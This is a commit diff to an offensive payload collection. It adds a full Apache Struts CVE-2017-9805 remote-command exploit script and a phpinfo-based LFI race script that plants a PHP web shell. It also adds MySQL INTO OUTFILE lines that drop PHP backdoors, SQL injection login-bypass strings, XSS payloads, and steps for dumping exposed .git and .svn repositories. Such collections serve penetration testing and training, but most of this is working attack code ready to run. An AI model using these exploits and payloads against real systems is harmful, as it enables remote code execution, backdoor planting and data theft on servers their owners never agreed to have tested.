Multiple update - LFI/RCE via phpinfo, Struts2 v2

CVE Shellshock Heartbleed Struts2/Apache Struts 2 CVE-2017-9805.py

@@ -0,0 +1,324 @@
+#!/usr/bin/env python3
+# coding=utf-8
+# *****************************************************
+# struts-pwn: Apache Struts CVE-2017-9805 Exploit
+# Author:
+# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
+# This code is based on:
+# https://github.com/rapid7/metasploit-framework/pull/8924
+# https://techblog.mediaservice.net/2017/09/detection-payload-for-the-new-struts-rest-vulnerability-cve-2017-9805/
+# *****************************************************
+import argparse
+import requests
+import sys
+
+# Disable SSL warnings
+try:
+    import requests.packages.urllib3
+    requests.packages.urllib3.disable_warnings()
+except Exception:
+    pass
+
+if len(sys.argv) <= 1:
+    print('[*] CVE: 2017-9805 - Apache Struts2 S2-052')
+    print('[*] Struts-PWN - @mazen160')
+    print('\n%s -h for help.' % (sys.argv[0]))
+    exit(0)
+
+parser = argparse.ArgumentParser()
+parser.add_argument("-u", "--url",
+                    dest="url",
+                    help="Check a single URL.",
+                    action='store')
+parser.add_argument("-l", "--list",
+                    dest="usedlist",
+                    help="Check a list of URLs.",
+                    action='store')
+parser.add_argument("-c", "--cmd",
+                    dest="cmd",
+                    help="Command to execute. (Default: 'echo test > /tmp/struts-pwn')",
+                    action='store',
+                    default='echo test > /tmp/struts-pwn')
+parser.add_argument("--exploit",
+                    dest="do_exploit",
+                    help="Exploit.",
+                    action='store_true')
+args = parser.parse_args()
+url = args.url if args.url else None
+usedlist = args.usedlist if args.usedlist else None
+url = args.url if args.url else None
+cmd = args.cmd if args.cmd else None
+do_exploit = args.do_exploit if args.do_exploit else None
+
+
+def url_prepare(url):
+    url = url.replace('#', '%23')
+    url = url.replace(' ', '%20')
+    if ('://' not in url):
+        url = str('http') + str('://') + str(url)
+    return(url)
+
+
+def exploit(url, cmd, dont_print_status_on_console=False):
+    url = url_prepare(url)
+    if dont_print_status_on_console is False:
+        print('\n[*] URL: %s' % (url))
+        print('[*] CMD: %s' % (cmd))
+    cmd = "".join(["<string>{0}</string>".format(_) for _ in cmd.split(" ")])
+
+    payload = """
+<map>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString>
+      <flags>0</flags>
+      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
+        <dataHandler>
+          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
+            <is class="javax.crypto.CipherInputStream">
+              <cipher class="javax.crypto.NullCipher">
+                <initialized>false</initialized>
+                <opmode>0</opmode>
+                <serviceIterator class="javax.imageio.spi.FilterIterator">
+                  <iter class="javax.imageio.spi.FilterIterator">
+                    <iter class="java.util.Collections$EmptyIterator"/>
+                    <next class="java.lang.ProcessBuilder">
+                      <command>
+                        {0}
+                      </command>
+                      <redirectErrorStream>false</redirectErrorStream>
+                    </next>
+                  </iter>
+                  <filter class="javax.imageio.ImageIO$ContainsFilter">
+                    <method>
+                      <class>java.lang.ProcessBuilder</class>
+                      <name>start</name>
+                      <parameter-types/>
+                    </method>
+                    <name>foo</name>
+                  </filter>
+                  <next class="string">foo</next>
+                </serviceIterator>
+                <lock/>
+              </cipher>
+              <input class="java.lang.ProcessBuilder$NullInputStream"/>
+              <ibuffer/>
+              <done>false</done>
+              <ostart>0</ostart>
+              <ofinish>0</ofinish>
+              <closed>false</closed>
+            </is>
+            <consumed>false</consumed>
+          </dataSource>
+          <transferFlavors/>
+        </dataHandler>
+        <dataLen>0</dataLen>
+      </value>
+    </jdk.nashorn.internal.objects.NativeString>
+    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+</map>
+""".format(cmd)
+
+    headers = {
+        'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2017-9805)',
+        # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
+        'Referer': str(url),
+        'Content-Type': 'application/xml',
+        'Accept': '*/*'
+    }
+
+    timeout = 3
+    try:
+        output = requests.post(url, data=payload, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
+    except Exception as e:
+        print("EXCEPTION::::--> " + str(e))
+        output = 'ERROR'
+    return(output)
+
+
+def check(url):
+    url = url_prepare(url)
+    print('\n[*] URL: %s' % (url))
+
+    initial_request = exploit(url, "", dont_print_status_on_console=True)
+    if initial_request == "ERROR":
+        result = False
+        print("The host does not respond as expected.")
+        return(result)
+
+    payload_sleep_based_10seconds = """
+<map>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString>
+      <flags>0</flags>
+      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
+        <dataHandler>
+          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
+            <is class="javax.crypto.CipherInputStream">
+              <cipher class="javax.crypto.NullCipher">
+                <initialized>false</initialized>
+                <opmode>0</opmode>
+                <serviceIterator class="javax.imageio.spi.FilterIterator">
+                  <iter class="javax.imageio.spi.FilterIterator">
+                    <iter class="java.util.Collections$EmptyIterator"/>
+                    <next class="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" serialization="custom">
+                      <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
+                        <default>
+                          <__name>Pwnr</__name>
+                          <__bytecodes>
+                            <byte-array>yv66vgAAADIAMwoAAwAiBwAxBwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFu
+dFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEA
+EkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJD
+bGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5
+bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94
+c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2Vy
+aWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFs
+YW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUv
+eG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9u
+cwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29t
+L3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3Vu
+L29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7
+KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1B
+eGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFs
+L3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMu
+amF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNs
+ZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRp
+bWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcv
+YXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFs
+L3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQAQamF2YS9sYW5nL1RocmVhZAcAKgEA
+BXNsZWVwAQAEKEopVgwALAAtCgArAC4BAA1TdGFja01hcFRhYmxlAQAeeXNvc2VyaWFsL1B3bmVy
+MTY3MTMxNTc4NjQ1ODk0AQAgTHlzb3NlcmlhbC9Qd25lcjE2NzEzMTU3ODY0NTg5NDsAIQACAAMA
+AQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0A
+AAAGAAEAAAAuAA4AAAAMAAEAAAAFAA8AMgAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0A
+AAAGAAEAAAAzAA4AAAAgAAMAAAABAA8AMgAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAa
+AAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA3AA4AAAAqAAQAAAABAA8AMgAA
+AAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAiAAMA
+AgAAAA2nAAMBTBEnEIW4AC+xAAAAAQAwAAAAAwABAwACACAAAAACACEAEQAAAAoAAQACACMAEAAJ
+</byte-array>
+                            <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFu
+dFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEA
+EkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2Vy
+aWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2
+YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xh
+bmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRp
+bC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQAB
+AAAABSq3AAGxAAAAAgANAAAABgABAAAAOwAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAA
+AAoAAQACABYAEAAJ</byte-array>
+                          </__bytecodes>
+                          <__transletIndex>-1</__transletIndex>
+                          <__indentNumber>0</__indentNumber>
+                        </default>
+                        <boolean>false</boolean>
+                      </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
+                    </next>
+                  </iter>
+                  <filter class="javax.imageio.ImageIO$ContainsFilter">
+                    <method>
+                      <class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
+                      <name>newTransformer</name>
+                      <parameter-types/>
+                    </method>
+                    <name>foo</name>
+                  </filter>
+                  <next class="string">foo</next>
+                </serviceIterator>
+                <lock/>
+              </cipher>
+              <input class="java.lang.ProcessBuilder$NullInputStream"/>
+              <ibuffer/>
+              <done>false</done>
+              <ostart>0</ostart>
+              <ofinish>0</ofinish>
+              <closed>false</closed>
+            </is>
+            <consumed>false</consumed>
+          </dataSource>
+          <transferFlavors/>
+        </dataHandler>
+        <dataLen>0</dataLen>
+      </value>
+    </jdk.nashorn.internal.objects.NativeString>
+    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+</map>
+"""
+    headers = {
+        'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2017-9805)',
+        # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
+        'Referer': str(url),
+        'Content-Type': 'application/xml',
+        'Accept': '*/*'
+    }
+
+    timeout = 8
+    try:
+        requests.post(url, data=payload_sleep_based_10seconds, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
+        # if the response returned before the request timeout.
+        # then, the host should not be vulnerable.
+        # The request should return > 10 seconds, while the timeout is 8.
+        result = False
+    except Exception:
+        result = True
+    return(result)
+
+
+def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
+    if url:
+        if not do_exploit:
+            result = check(url)
+            output = '[*] Status: '
+            if result is True:
+                output += 'Vulnerable!'
+            else:
+                output += 'Not Affected.'
+            print(output)
+        else:
+            exploit(url, cmd)
+            print("[$] Request sent.")
+            print("[.] If the host is vulnerable, the command will be executed in the background.")
+
+    if usedlist:
+        URLs_List = []
+        try:
+            f_file = open(str(usedlist), 'r')
+            URLs_List = f_file.read().replace('\r', '').split('\n')
+            try:
+                URLs_List.remove('')
+            except ValueError:
+                pass
+            f_file.close()
+        except Exception as e:
+            print('Error: There was an error in reading list file.')
+            print("Exception: " + str(e))
+            exit(1)
+        for url in URLs_List:
+            if not do_exploit:
+                result = check(url)
+                output = '[*] Status: '
+                if result is True:
+                    output += 'Vulnerable!'
+                else:
+                    output += 'Not Affected.'
+                print(output)
+            else:
+                exploit(url, cmd)
+                print("[$] Request sent.")
+                print("[.] If the host is vulnerable, the command will be executed in the background.")
+
+    print('[%] Done.')
+
+if __name__ == '__main__':
+    try:
+        main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
+    except KeyboardInterrupt:
+        print('\nKeyboardInterrupt Detected.')
+        print('Exiting...')
+        exit(0)

File Inclusion - Path Traversal/README.md

@@ -87,7 +87,13 @@ http://example.com/index.php?page=path/to/uploaded/file.png
 ```
 You can injected the <?php system($_GET['c']); ?> into the metadata
 
+## LFI to RCE via Phpinfo()
+https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
+Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
+
+
 ## Thanks to
 * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
 * [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)
 * [Turning LFI to RFI ](https://l.avala.mp/?p=241)
+* [Is PHP vulnerable and under what conditions?](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)

File Inclusion - Path Traversal/phpinfolfi.py

@@ -0,0 +1,192 @@
+#!/usr/bin/python
+# https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
+import sys
+import threading
+import socket
+
+def setup(host, port):
+    TAG="Security Test"
+    PAYLOAD="""%s\r
+<?php $c=fopen('/tmp/g','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>\r""" % TAG
+    REQ1_DATA="""-----------------------------7dbff1ded0714\r
+Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
+Content-Type: text/plain\r
+\r
+%s
+-----------------------------7dbff1ded0714--\r""" % PAYLOAD
+    padding="A" * 5000
+    REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r
+Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie="""+padding+"""\r
+HTTP_ACCEPT: """ + padding + """\r
+HTTP_USER_AGENT: """+padding+"""\r
+HTTP_ACCEPT_LANGUAGE: """+padding+"""\r
+HTTP_PRAGMA: """+padding+"""\r
+Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
+Content-Length: %s\r
+Host: %s\r
+\r
+%s""" %(len(REQ1_DATA),host,REQ1_DATA)
+    #modify this to suit the LFI script
+    LFIREQ="""GET /lfi.php?load=%s%%00 HTTP/1.1\r
+User-Agent: Mozilla/4.0\r
+Proxy-Connection: Keep-Alive\r
+Host: %s\r
+\r
+\r
+"""
+    return (REQ1, TAG, LFIREQ)
+
+def phpInfoLFI(host, port, phpinforeq, offset, lfireq, tag):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+    s.connect((host, port))
+    s2.connect((host, port))
+
+    s.send(phpinforeq)
+    d = ""
+    while len(d) < offset:
+        d += s.recv(offset)
+    try:
+        i = d.index("[tmp_name] =>")
+        fn = d[i+17:i+31]
+    except ValueError:
+        return None
+
+    s2.send(lfireq % (fn, host))
+    d = s2.recv(4096)
+    s.close()
+    s2.close()
+
+    if d.find(tag) != -1:
+        return fn
+
+counter=0
+class ThreadWorker(threading.Thread):
+    def __init__(self, e, l, m, *args):
+        threading.Thread.__init__(self)
+        self.event = e
+        self.lock =  l
+        self.maxattempts = m
+        self.args = args
+
+    def run(self):
+        global counter
+        while not self.event.is_set():
+            with self.lock:
+                if counter >= self.maxattempts:
+                    return
+                counter+=1
+
+            try:
+                x = phpInfoLFI(*self.args)
+                if self.event.is_set():
+                    break
+                if x:
+                    print "\nGot it! Shell created in /tmp/g"
+                    self.event.set()
+
+            except socket.error:
+                return
+
+
+def getOffset(host, port, phpinforeq):
+    """Gets offset of tmp_name in the php output"""
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((host,port))
+    s.send(phpinforeq)
+
+    d = ""
+    while True:
+        i = s.recv(4096)
+        d+=i
+        if i == "":
+            break
+        # detect the final chunk
+        if i.endswith("0\r\n\r\n"):
+            break
+    s.close()
+    i = d.find("[tmp_name] =>")
+    if i == -1:
+        raise ValueError("No php tmp_name in phpinfo output")
+
+    print "found %s at %i" % (d[i:i+10],i)
+    # padded up a bit
+    return i+256
+
+def main():
+
+    print "LFI With PHPInfo()"
+    print "-=" * 30
+
+    if len(sys.argv) < 2:
+        print "Usage: %s host [port] [threads]" % sys.argv[0]
+        sys.exit(1)
+
+    try:
+        host = socket.gethostbyname(sys.argv[1])
+    except socket.error, e:
+        print "Error with hostname %s: %s" % (sys.argv[1], e)
+        sys.exit(1)
+
+    port=80
+    try:
+        port = int(sys.argv[2])
+    except IndexError:
+        pass
+    except ValueError, e:
+        print "Error with port %d: %s" % (sys.argv[2], e)
+        sys.exit(1)
+
+    poolsz=10
+    try:
+        poolsz = int(sys.argv[3])
+    except IndexError:
+        pass
+    except ValueError, e:
+        print "Error with poolsz %d: %s" % (sys.argv[3], e)
+        sys.exit(1)
+
+    print "Getting initial offset...",
+    reqphp, tag, reqlfi = setup(host, port)
+    offset = getOffset(host, port, reqphp)
+    sys.stdout.flush()
+
+    maxattempts = 1000
+    e = threading.Event()
+    l = threading.Lock()
+
+    print "Spawning worker pool (%d)..." % poolsz
+    sys.stdout.flush()
+
+    tp = []
+    for i in range(0,poolsz):
+        tp.append(ThreadWorker(e,l,maxattempts, host, port, reqphp, offset, reqlfi, tag))
+
+    for t in tp:
+        t.start()
+    try:
+        while not e.wait(1):
+            if e.is_set():
+                break
+            with l:
+                sys.stdout.write( "\r% 4d / % 4d" % (counter, maxattempts))
+                sys.stdout.flush()
+                if counter >= maxattempts:
+                    break
+        print
+        if e.is_set():
+            print "Woot!  \m/"
+        else:
+            print ":("
+    except KeyboardInterrupt:
+        print "\nTelling threads to shutdown..."
+        e.set()
+
+    print "Shuttin' down..."
+    for t in tp:
+        t.join()
+
+if __name__=="__main__":
+    print "Don't forget to modify the LFI URL"
+    main()

Insecured source code management/README.md

@@ -1,7 +1,7 @@
 # GIT - Source management
 
-Github example
-1. Check 403 error (Forbidden) for .git or even better : directory listing 
+## Github example with a .git
+1. Check 403 error (Forbidden) for .git or even better : directory listing
 
 2. Git saves all informations in log file .git/logs/HEAD (try 'head' too)
 ```
@@ -55,7 +55,7 @@ git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
 
 
 
-5. Alternative way : diggit.py
+## Automatic way : diggit.py
 ```
 ./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
 ./diggit.py -u http://webpage.com -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
@@ -65,7 +65,7 @@ git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
 -o is a hash of particular Git object to download
 ```
 
-5. Alternative way : rip-git
+## Alternative way : rip-git
 ```
 perl rip-git.pl -v -u "http://edge1.web.*****.com/.git/"   
 
@@ -82,7 +82,7 @@ git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
 
 
 # SVN - Source management
-SVN example (Wordpress)
+## SVN example (Wordpress)
 ```
 curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
 ```
@@ -100,7 +100,7 @@ use first two signs from hash as folder name inside pristine/ directory (94 in t
 create complete path, which will be: http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base
 
 
-### Automatic way -
+## Automatic way -
 ```
 git clone https://github.com/anantshri/svn-extractor.git
 python svn-extractor.py –url “url with .svn available”

SQL injection/MySQL Injection.md

@@ -54,6 +54,7 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
 ```
 +BENCHMARK(40000000,SHA1(1337))+
 '%2Bbenchmark(3200,SHA1(1))%2B'
+' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2
 ```
 
 
@@ -71,4 +72,5 @@ AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
 ##MYSQL DROP SHELL
 ```
 SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
+SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo();?>
 ```

SQL injection/README.md

@@ -123,6 +123,7 @@ or true--
 " or "x"="x
 ") or ("x")=("x
 ")) or (("x"))=(("x
+or 2 like 2
 or 1=1
 or 1=1--
 or 1=1#
@@ -130,6 +131,14 @@ or 1=1/*
 admin' --
 admin' #
 admin'/*
+admin' or '2' LIKE '1
+admin' or 2 LIKE 2--
+admin' or 2 LIKE 2#
+admin') or 2 LIKE 2#
+admin') or 2 LIKE 2--
+admin') or ('2' LIKE '2
+admin') or ('2' LIKE '2'#
+admin') or ('2' LIKE '2'/*
 admin' or '1'='1
 admin' or '1'='1'--
 admin' or '1'='1'#
@@ -318,3 +327,4 @@ mysql> mysql> select version();
   - [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/)
   - [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html)
   - [SQLi in INSERT worse than SELECT](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
+  - [Manual SQL Injection Tips](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)

XSS injection/README.md

@@ -34,6 +34,7 @@ Basic payload
 
 Img payload
 <img src=x onerror=alert('XSS');>
+<img src=x onerror=alert('XSS')//
 <img src=x onerror=alert(String.fromCharCode(88,83,83));>
 <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
 <img src=x:alert(alt) onerror=eval(src) alt=xss>
@@ -43,6 +44,7 @@ Img payload
 Svg payload
 <svgonload=alert(1)>
 <svg/onload=alert('XSS')>
+<svg onload=alert(1)//
 <svg/onload=alert(String.fromCharCode(88,83,83))>
 <svg id=alert(1) onload=eval(id)>
 "><svg/onload=alert(String.fromCharCode(88,83,83))>
@@ -92,6 +94,7 @@ banner.swf?clickTAG=javascript:alert(1);//
 io.swf?yid=\"));}catch(e){alert(1);}//
 video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
 bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
+flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
 ```
 
 XSS in Hidden input
@@ -496,6 +499,10 @@ XSSObject.proxy = function (obj, name, report_function_name, exec_original) {
 XSSObject.proxy(window, 'alert', 'window.alert', false);
 ```
 
+Bypass ">" using nothing #trololo (you don't need to close your tags)
+```
+<svg onload=alert(1)//
+```
 
 Bypass ';' using another character
 ```